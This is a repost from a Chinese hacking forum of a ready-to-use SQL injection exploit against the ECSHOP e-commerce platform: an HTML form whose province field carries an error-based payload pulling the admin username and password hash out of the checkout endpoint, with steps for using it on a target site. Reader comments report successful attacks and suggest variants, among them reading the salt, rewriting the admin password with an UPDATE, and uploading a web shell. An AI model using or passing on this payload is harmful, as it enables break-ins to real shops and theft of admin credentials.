ECSHOP各版本注入漏洞 EXP【我是转的】
漏洞作者:y35u
https://www.t00ls.com/viewthread.php?tid=21332&extra=&page=1
我(这是作者吧:小Dの马)给个代码,登陆目标网站,注册,选任意一件商品加入到购物车,然后结算,将下面的代码保存为html就可以注入了
<form name="form1" method="post">
ECSHOP通版本注入漏洞 2012圣诞版简单EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />
<textarea rows="5" style="font-family:Times New Roman;font-size:14pt;" cols="80" name="province">11'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#</textarea>
<input name="district" type="text" style="display:none" value="1294"/>
<input name="consignee" type="text" style="display:none" value="1111111"/>
<input name="email" type="text" style="display:none" value="[email protected]"/>
<input name="address" type="text" style="display:none" value="111111"/>
<input name="tel" type="text" style="display:none" value="1111111"/>
<input name="step" type="text" style="display:none" value="consignee"/>
<input name="act" type="text" style="display:none" value="checkout"/><br /><br />
地址:<input name="theAction" type="text" id="theAction" value="http://xxx.com/flow.php?step=consignee" size="50"><br /><br />
<input type="submit" value="配送至这个地址" onClick="this.form.action=this.form.theAction.value;" name="Submit"><br/><br />
</form>
好像视觉不是很好,呵呵。
评论34次
测试通过 很给力 ~~谢谢分享`
测试成功了!感谢分享!
33位的去掉1解不出来。V2.7.3默认开启salt吗?
测试成功-- 回来顶贴
学xi了 谢谢楼主分享
楼主可以把sql语句写成update语句吗?现在的版本都是md5(md5($pass).salt)的,把上面的sql语句里把password字段改为ec_salt就可以把salt爆出来了,如果写成update的语句的话,不用去解密文了,直接加把自已的密码的md5(md5(你的密码).它的salt)update上去,解也不用解就能日进去了,这是我的思路。。。。
没事的`在sql语句上把password字段换成ec_salt,再inj就可以把salt也读出来了,这个不是问题。。
https://www.t00ls.com/thread-21437-1-1.html
求方法啊!我也遇到这个问题了,FCK做限制了!
这个有salt??那不是同样悲剧。
@changtool 有暴出所有管理员帐号的语句吗
能不能暴出所有的管理员帐号 这样如果一个密码MD5解不出来 还可以换一个??
ecshop解密是个难题,上传shell问题不大。越来越难搞了。
ecshop现在是33位了?
有1吗 刚解了个密码 顺利 估计版本不一样
ecshop 好像有salt了
测试成功 谢谢楼猪!
这个就是耶稣放出来那个洞的EXP吧,爆了密码也解不出,ECSHOP越来越变态了。。。
exp 发终于出来了
爆密码好像成功不少,但SHELL估计有点疼啊。。。。。这个蛋啊。。